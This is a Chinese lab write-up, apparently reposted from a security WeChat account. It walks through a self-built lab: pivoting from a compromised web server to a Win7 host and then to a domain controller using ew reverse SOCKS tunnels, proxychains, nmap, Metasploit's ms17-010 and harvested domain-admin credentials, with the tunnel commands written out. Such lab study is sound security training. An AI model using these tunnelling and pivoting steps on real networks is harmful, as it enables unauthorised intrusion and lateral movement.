内网入门学习-使用ew代理进入内网实验

admin 2022年1月19日22:21:47安全文章评论95 views2868字阅读9分33秒阅读模式

13日

使用ew进行代理进入内网
内网入门学习-使用ew代理进入内网实验
前排招亲
内网入门学习-使用ew代理进入内网实验
0x00 前言
在某个辗转反侧的夜晚,爬起来看了一会书,然后就打开音乐做实验了。

整篇文章一步一步往下走,学习如何使用代理进入内网。
在文章的最后,才会放实验环境的拓扑图。
本实验主要是学会如何搭建代理
内网入门学习-使用ew代理进入内网实验
0x01 通过web服务器拿下内网win7
假设前提:我们已经拿下了 一台web服务器(centos)

1、我们拥有了web服务器的控制权,但是我们发现就部署了一个很小的业务,没啥东西,因此在上面查看了一下这台服务器的信息,除了公网IP外,发现了它有另外一张网卡:192.168.22.0/24
2、通过一些优秀的网站管理工具,我们往web服务器上面上传了ew--一款网络穿透工具
3、在kali上面尝试访问web服务器的内网IP:192.168.22.129

内网入门学习-使用ew代理进入内网实验


公网访问内网自然是不能访问的,那我想去内网看看怎么办?只能依靠代理服务,将公网机器上面的程序代理到web服务器上面去运行(这是个人对于代理的理解,有误请赐教)


4、我们先在kali上面做正向代理,起一个转接隧道

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

将本地的1080端口接收到的请求,转给本机的1234端口
        

内网入门学习-使用ew代理进入内网实验


5、在web服务器上面起反向代理
./ew_for_linux64 -s rssocks -d 192.168.100.221(kali IP地址) -e 1234

内网入门学习-使用ew代理进入内网实验


在kali配置etc/proxychains.conf代理设置

Socks5 127.0.0.1 1080

表示通过proxychains启动的软件都是走kali的1080端口


以下是个人对于上面操作的理解:

前面我们设置的1080端口的请求都会转给1234端口,centos又反向连接kali的1234端口,那么proxychains启动的软件,就会被代理到centos上面进行工作,也就是说在kali上面运行的软件,被代理到centos去运行。


6、使用代理启动nmap扫描内网

原本192.168.22.0在kali上面是不可以访问到的,无法扫描该网段,现在可以通过proxychains进行访问扫描


内网入门学习-使用ew代理进入内网实验

内网入门学习-使用ew代理进入内网实验


我们发现了一个IP:192.168.22.130,通过使用nmap其它参数 -A 进行扫描发现这是一台win7


7、使用代理启动msf

proxychains msfconsole


内网入门学习-使用ew代理进入内网实验


通过代理msf利用ms17-010进入win7,并且抓取到了域用户账号密码。

这里遇到了一个问题:
可能是因为用代理进行攻击,成功率太低了,我试了一个小时人品没爆发,就直接远程登录了,这部分操作暂时没法截图,其实也还有说使用另外一个方式会提高成功率,我单单搞环境就搞了好久,应该是镜像源的问题。
ms17-010在上一篇中已经实验过,那里使用的反弹的方式,这里是使用正向链接的方式。


8、通过代理远程登录win7

在上一步我们获取到了账号密码

Proxychains  rdesktop 192.168.22.130


内网入门学习-使用ew代理进入内网实验


9、进行一波信息收集

发现居然还有另一张网卡,再一看,居然还是域用户

查域用户


内网入门学习-使用ew代理进入内网实验


查找域管理员


内网入门学习-使用ew代理进入内网实验


发现之前登录win7的账号居然是域管理员

赶紧找一下域管理器

查找域名

发现Hacke.testlab


内网入门学习-使用ew代理进入内网实验


判断域控服务器的IP地址

书上的nslookup解析域名的方式不成功(未百度到原因,希望有师傅指导一下),因此我试着ping一下,一般来说,会是域控制器,但不排除对方将域控制器和dns服务器分开部署。


内网入门学习-使用ew代理进入内网实验

内网入门学习-使用ew代理进入内网实验
0x02 阶段总结

至此我们拥有了以下东西:

一台web服务器:一个公网IP,一个内网IP

一台在域环境内的win7:一个内网IP(网段a),一个内网IP(网段b)

域控服务器的IP地址

域管理员的账号密码

 

这里捋一下思路:

我们第一次使用ew进行代理,是在kali上面和web服务器上面进行了设置,从而使我们能够去访问win7

原因是web服务器有一个公网IP一个内网IP,win7也有一个内网IP,这两个内网IP属于同一个网段a.我们一开始就控制了web服务器,并在上面开启了socks代理,因此我们可以通过代理服务扫描网段a,从而发现了win7。

 

我们发现win7后,使用代理启动msf攻击,获取了win7的会话,发现win7居然有另外一个网段b,它居然是一个域主机,因此我们收集信息,发现了处于网段b里面的域控服务器。

 

我们要去域控看看!

但是我们访问不到网段b。

所以我们要利用win7做踏板,访问域控


内网入门学习-使用ew代理进入内网实验
0x03 web-win7-DC

前提:我们有web服务器,又通过ms17-010拿下win7,之前用网站管理工具都能上传ew,那么msf也是可以上传ew的,所以我们在win7上面也上传了ew

1、在web服务器上面:

./ew_linux_x64 -s rcsocks -l 6666 -e 5678

在web服务器上面添加一个转接隧道,把web服务器的6666端口接收到的请求发给5678端口。


内网入门学习-使用ew代理进入内网实验


2、在win7上面:

ew.exe-s rssocks -d 192.168.22.129 -e 5678

在win7上面开启socks5服务,并反弹到web服务器的5678端口


内网入门学习-使用ew代理进入内网实验


3、kali上面远程访问域控服务器

Kali本身可以访问web服务器,因此使用代理访问web服务器的6666端口的请求会被转到5678端口,然后被反连web服务器5678端口的win7接收并处理。


内网入门学习-使用ew代理进入内网实验


4、通过代理扫描192.168.33.3(dc)


内网入门学习-使用ew代理进入内网实验



内网入门学习-使用ew代理进入内网实验
0x04 最后总结

其实看着挺麻烦,做完整个实验后,我发现,前后两个代理都是二层代理:

第一个代理:

Kali-web-win7

1、通过web漏洞拿下了web,发现了有一个内网网段

2、好奇,想要看看这个网段有什么,但是外网不能访问内网网段,所以我们要让工具在web服务器上面跑。

3、在web服务器上面开启代理服务,这样就可以把我们的工具代理过去扫描。

4、成功的扫出来了win7

第二个代理:

Kali-web-win7-dc

做完实验后发现,其实就是将两层代理后移了

1、扫出来win7后,利用代理msf进行攻击拿下win7

2、发现有域,收集好信息

3、在win7上面开启代理服务

4、在web上面做一个转接,让kali的工具可以通过win7去扫描更深一层的网段

 

我原本想实验一下三层代理怎么搞,但是搞个二层就遇到了很多环境和别的问题,遇到的非代理问题,在文章中都省略了,如果有人也在做类似的实验,遇到的问题可以一起学习百度。

更多的代理实现及原理可以在ew的GitHub上面看,非常明了,多看几遍,如下图:

https://github.com/idlefire/ew

 

内网入门学习-使用ew代理进入内网实验


这个自己搞的靶场都问题多多,不得不说大佬们是真的狠,实际环境要复杂得多,各个却来去自如。


内网入门学习-使用ew代理进入内网实验
0x05 拓扑 

内网入门学习-使用ew代理进入内网实验

内网入门学习-使用ew代理进入内网实验
0x06 other 其他 
如您有任何问题、建议、需求请后台留言NOVASEC公众号
团队初创,热烈希望现在以及未来的大佬们能够投稿支持!

内网入门学习-使用ew代理进入内网实验
感谢大哥们的对NOVASEC的支持点赞和关注,加入我们与萌新一起成长吧。

内网入门学习-使用ew代理进入内网实验




本文始发于微信公众号(NOVASEC):内网入门学习-使用ew代理进入内网实验

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月19日22:21:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  内网入门学习-使用ew代理进入内网实验 https://cn-sec.com/archives/494891.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: